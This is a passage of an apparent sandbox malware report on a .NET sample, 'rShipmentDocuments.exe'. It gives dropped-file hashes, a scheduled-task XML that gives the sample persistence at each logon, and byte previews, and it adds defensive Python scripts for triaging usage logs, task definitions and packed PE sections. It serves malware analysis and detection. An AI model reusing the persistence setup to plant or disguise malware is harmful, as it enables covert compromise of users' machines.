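3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
'''


def parse_usage_log(text):
    """Return one dict per record.

    kind 1: a setting (name, value, flag); kind 2: an assembly bound without a
    native image (name, flag); kind 3: an assembly bound to an NGEN image
    (name, path, flag). Inferred from the sample above.
    """
    records = []
    for row in csv.reader(text.splitlines()):
        if not row:
            continue
        kind, flag = int(row[0]), int(row[-1])
        rec = {"kind": kind, "name": row[1], "flag": flag, "value": None, "path": None}
        if kind == 1:
            rec["value"] = row[2]
        elif kind == 3:
            rec["path"] = row[2]
        records.append(rec)
    return records


def assembly_names(records):
    """Short names of the assemblies the process bound (kinds 2 and 3), in load order."""
    return [r["name"].split(",")[0] for r in records if r["kind"] in (2, 3)]


def native_image_paths(records):
    """Map assembly short name -> NGEN image path for records that carry one."""
    return {r["name"].split(",")[0]: r["path"] for r in records if r["path"]}


def unusual_binds(records, baseline=("mscorlib", "System", "System.Core")):
    """Assemblies outside a caller-supplied baseline: a quick view of what a small
    executable pulls in beyond the runtime basics (here WinForms, Drawing,
    Configuration)."""
    return [n for n in assembly_names(records) if n not in baseline]


if __name__ == "__main__":
    recs = parse_usage_log(SAMPLE_LOG)
    print("bound:", ", ".join(assembly_names(recs)))
    print("beyond baseline:", ", ".join(unusual_binds(recs)))
    for name, path in native_image_paths(recs).items():
        print(f"  {name} -> {path}")
```

When triaging a host, point `parse_usage_log` at each `.log` in the UsageLogs folder: the file name gives the executable, and `unusual_binds` shows whether a supposedly trivial binary pulled in UI, networking or configuration assemblies.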
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2232
                                                    Entropy (8bit):5.379736180876081
                                                    Encrypted:false
                                                    SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:tLHyIFKL3IZ2KRH9Oug8s
                                                    MD5:D8B04C656CC5C9421FAD6B626E6A2EF1
                                                    SHA1:68B625362ACEC0E85A074829D5ACF94EEB5C97E6
                                                    SHA-256:CACA00B0843523626D1560DD9244C2ED9F1D15628D14B3231DD05A0AC1D60293
                                                    SHA-512:1FC0FEA68AC201F7DE945FA132434E27C255F08B30B3CBBAF825A1809D7ED706D8569CF1B75918A3383E9AA7F1DC52CEC7D60725F963801F97B1012C82165D60
                                                    Malicious:false
                                                    Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:XML 1.0 document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1576
                                                    Entropy (8bit):5.110917865838122
                                                    Encrypted:false
                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtagKxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTvev
                                                    MD5:FF538A65DF2E9BBCC2651DCF881BD89F
                                                    SHA1:429AE22BF3F5A2171CA564673CB52E6A0A1D276C
                                                    SHA-256:F67551C7BD363B57A314ED9DA63D9B3C205C844D6BEAC3CF7B550F68E6689C88
                                                    SHA-512:349CCC3D0BB83621DE247D75039C2A908BF3FBDCAA227E650ED6311E948E227086F0DF8937988776D50848841033DBF7249EC7C7129C1AF6CB019D40712F2571
                                                    Malicious:true
                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                    Process:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    File Type:XML 1.0 document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1576
                                                    Entropy (8bit):5.110917865838122
                                                    Encrypted:false
                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtagKxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTvev
                                                    MD5:FF538A65DF2E9BBCC2651DCF881BD89F
                                                    SHA1:429AE22BF3F5A2171CA564673CB52E6A0A1D276C
                                                    SHA-256:F67551C7BD363B57A314ED9DA63D9B3C205C844D6BEAC3CF7B550F68E6689C88
                                                    SHA-512:349CCC3D0BB83621DE247D75039C2A908BF3FBDCAA227E650ED6311E948E227086F0DF8937988776D50848841033DBF7249EC7C7129C1AF6CB019D40712F2571
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
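The task definition above is dropped twice with the same hash, once by the original sample and once by its copy in AppData\Roaming, and its visible parts describe persistence at every interactive logon of the current user at LeastPrivilege. The preview stops before the Actions element, so the command the task runs is not on the page. The triage script below is an added example, not the report's or Joe Sandbox's code: its sample XML copies the RegistrationInfo, Triggers, Principals and part of the Settings from the preview, while the Actions element and its command path are assumptions (the path used is the self-copy the report lists as a process, C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe). It also checks the registration date against the sample's compile time from the PE header, since a 2014 registration date on a task created by a binary compiled in 2024 is a templated value rather than a real timestamp.

```python
r"""Triage a Task Scheduler XML definition such as the one dropped above.

Added example, not part of the Joe Sandbox report. SAMPLE_TASK_XML is
constructed: RegistrationInfo, Triggers, Principals and part of Settings are
copied from the preview above, while the <Actions> element is an ASSUMPTION
(the preview is cut off before it); the command path used is the self-copy the
report lists as a process, C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# User-writable locations in which a task's action should raise a flag.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Users\\[^\\]+\\Desktop|Windows\\Temp|ProgramData)\\",
    re.IGNORECASE,
)

# Compile time of the sample from the report's PE header (Time Stamp 0x67086BC5).
SAMPLE_COMPILE_TIME = datetime(2024, 10, 11, 0, 5, 25)

SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\ZOlmYtPdlO.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def load_task_xml(data):
    """Accept the on-disk bytes (UTF-16 with BOM, as the declaration says) or
    already-decoded text, and strip the declaration so ET parses plain text."""
    if isinstance(data, bytes):
        bom = data[:2] in (b"\xff\xfe", b"\xfe\xff")
        data = data.decode("utf-16" if bom else "utf-8")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", data)


def triage_task(data, compiled_at=None):
    """Return the task's key fields plus the findings a hunter would act on."""
    root = ET.fromstring(load_task_xml(data))
    text = lambda path: root.findtext(path, "", NS)
    logon = any(
        tr.findtext("t:Enabled", "true", NS).lower() == "true"
        for tr in root.findall("t:Triggers/t:LogonTrigger", NS)
    )
    commands = [e.findtext("t:Command", "", NS) for e in root.findall("t:Actions/t:Exec", NS)]
    date_text = text("t:RegistrationInfo/t:Date")
    # Seven fractional digits, which fromisoformat rejects on older Pythons: trim them.
    registered = datetime.strptime(date_text[:19], "%Y-%m-%dT%H:%M:%S") if date_text else None

    findings = []
    if logon:
        findings.append("enabled LogonTrigger for " + text("t:Triggers/t:LogonTrigger/t:UserId"))
    for cmd in commands:
        if USER_WRITABLE.search(cmd):
            findings.append("action in user-writable path: " + cmd)
    if compiled_at and registered and registered < compiled_at:
        findings.append(f"RegistrationInfo/Date {registered} predates the binary's compile time {compiled_at}")
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "logon_trigger": logon,
        "commands": commands,
        "registered": registered,
        "findings": findings,
    }


if __name__ == "__main__":
    for line in triage_task(SAMPLE_TASK_XML, SAMPLE_COMPILE_TIME)["findings"]:
        print(line)
```

On a live host the same function can be run over the files under C:\Windows\System32\Tasks, which are stored in the same XML schema; read them as bytes so the UTF-16 BOM handling applies.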
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):731136
                                                    Entropy (8bit):7.836582313791281
                                                    Encrypted:false
                                                    SSDEEP:12288:OskYjNiZUyOEXNHqmMqNuGV7w1dgRFreBtN0V9a+W3OeqWNXWqpIlZreBz:OskY4ZUyOoVjMqNvV02RliSa+W3OeqbS
                                                    MD5:FF8C4AB4EC18F05864879323F4A41050
                                                    SHA1:6552329870D1A2627B5E9B6B6CFD3D2EFEA87735
                                                    SHA-256:DB4523C5FA05ACF8D6C8D47C722A5C39A728078F94A7F6877FAA0A6FB87AFC33
                                                    SHA-512:3F9F38DDDDC665FE1664AE356BD18D70767D0DF3925DFE0A1AD324DC29CB1738F7E1E49DDB55D62FF1204D4ECBA13A3E557EBBFFB2D8DD8AEA35B10595E76B67
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    • Antivirus: Virustotal, Detection: 38%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g..............0.................. ...@....@.. ....................................`.....................................W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B........................H......................pr.../...........................................0..........*....0...........(.......s....o.....*....0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}.
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.836582313791281
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:rShipmentDocuments.exe
                                                    File size:731'136 bytes
                                                    MD5:ff8c4ab4ec18f05864879323f4a41050
                                                    SHA1:6552329870d1a2627b5e9b6b6cfd3d2efea87735
                                                    SHA256:db4523c5fa05acf8d6c8d47c722a5c39a728078f94a7f6877faa0a6fb87afc33
                                                    SHA512:3f9f38ddddc665fe1664ae356bd18d70767d0df3925dfe0a1ad324dc29cb1738f7e1e49ddb55d62ff1204d4ecba13a3e557ebbffb2d8dd8aea35b10595e76b67
                                                    SSDEEP:12288:OskYjNiZUyOEXNHqmMqNuGV7w1dgRFreBtN0V9a+W3OeqWNXWqpIlZreBz:OskY4ZUyOoVjMqNvV02RliSa+W3OeqbS
                                                    TLSH:CDF402947601F4AFC8A38B714970EE3656606D7ED217D203A5EB0CABB90C6D79F042F2
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g..............0.................. ...@....@.. ....................................`................................
                                                    Icon Hash:01242c66198d8d9e
                                                    Entrypoint:0x4b2eee
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x67086BC5 [Fri Oct 11 00:05:25 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al   (this line repeats 97 times: the bytes after the CLR entry stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb2e94          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb4000          0x13a0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xb0ef4       0xb1000   c0ca5f2b1c6a59e831a518f66851b2a6  False     0.9136087018891242  data       7.843601109745972    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xb4000          0x13a0        0x1400    6db8d0c06bec1be6b093712fbab9dd0c  False     0.7779296875        data       7.024434569967951    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb6000          0xc           0x200     d3796c53484af9b2d0e55926dbea4140  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
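The section table is the first static hint of what the dynamic signatures later confirm: .text carries practically the whole file (0xb1000 raw bytes) at an entropy of 7.84 bits per byte with a ZLIB complexity of 0.91, while .reloc and the icon-only .rsrc are normal. Ordinary .NET IL and metadata do not reach that entropy, so the managed body is compressed or encrypted and unpacked at run time. The check below is an added example, not code from the report or from Joe Sandbox: a dependency-free walk of the PE section table that computes per-section Shannon entropy from the raw bytes and flags executable sections above a threshold. The 7.0 bits/byte cut-off is an assumption (a common heuristic, not a value stated on the page), and the PE image it runs on is a constructed, non-loadable skeleton that only mimics the .text/.reloc layout above, not the analysed sample.

```python
import math
import random
import struct

# Section characteristic flags from the PE/COFF specification (those appearing in the table).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000

# Assumed heuristic cut-off in bits per byte; plain native or IL code sits well below it.
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list[dict]:
    """Walk IMAGE_SECTION_HEADER entries and compute the entropy of each section's raw data."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional_header = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional_header  # section headers follow the optional header
    sections = []
    for i in range(number_of_sections):
        hdr = table + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        virtual_size, virtual_address, raw_size, raw_ptr = struct.unpack_from("<4I", pe, hdr + 8)
        characteristics = struct.unpack_from("<I", pe, hdr + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name,
            "virtual_address": virtual_address,
            "virtual_size": virtual_size,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "characteristics": characteristics,
        })
    return sections


def suspicious_sections(sections: list[dict], threshold: float = PACKED_ENTROPY_THRESHOLD) -> list[str]:
    """Names of executable sections whose raw bytes look compressed or encrypted."""
    return [s["name"] for s in sections
            if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] >= threshold]


def build_sample_pe() -> bytes:
    """Constructed, non-loadable PE skeleton: a high-entropy executable .text and a near-empty
    .reloc, mirroring the layout in the table. It is not derived from the analysed sample."""
    rng = random.Random(0x1531471)
    text_raw = bytes(rng.getrandbits(8) for _ in range(0x1000))  # stands in for packed code
    reloc_raw = b"\x00\x20\x00\x00\x0c\x00\x00\x00\x00\x30\x00\x00" + b"\x00" * (0x200 - 12)

    img = bytearray(0x1400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    img[0x40:0x44] = b"PE\0\0"
    coff = 0x44
    # Machine i386, 2 sections, no timestamp/symbols, PE32 optional header (0xE0), EXECUTABLE|32BIT
    struct.pack_into("<HHIIIHH", img, coff, 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    table = coff + 20 + 0xE0
    headers = [
        (b".text", 0xb0ef4, 0x2000, len(text_raw), 0x200,
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".reloc", 0xc, 0xb6000, len(reloc_raw), 0x1200,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
    ]
    for i, (name, vsize, va, rsize, rptr, chars) in enumerate(headers):
        hdr = table + 40 * i
        img[hdr:hdr + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", img, hdr + 8, vsize, va, rsize, rptr)
        struct.pack_into("<I", img, hdr + 36, chars)
    img[0x200:0x200 + len(text_raw)] = text_raw
    img[0x1200:0x1200 + len(reloc_raw)] = reloc_raw
    return bytes(img)


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
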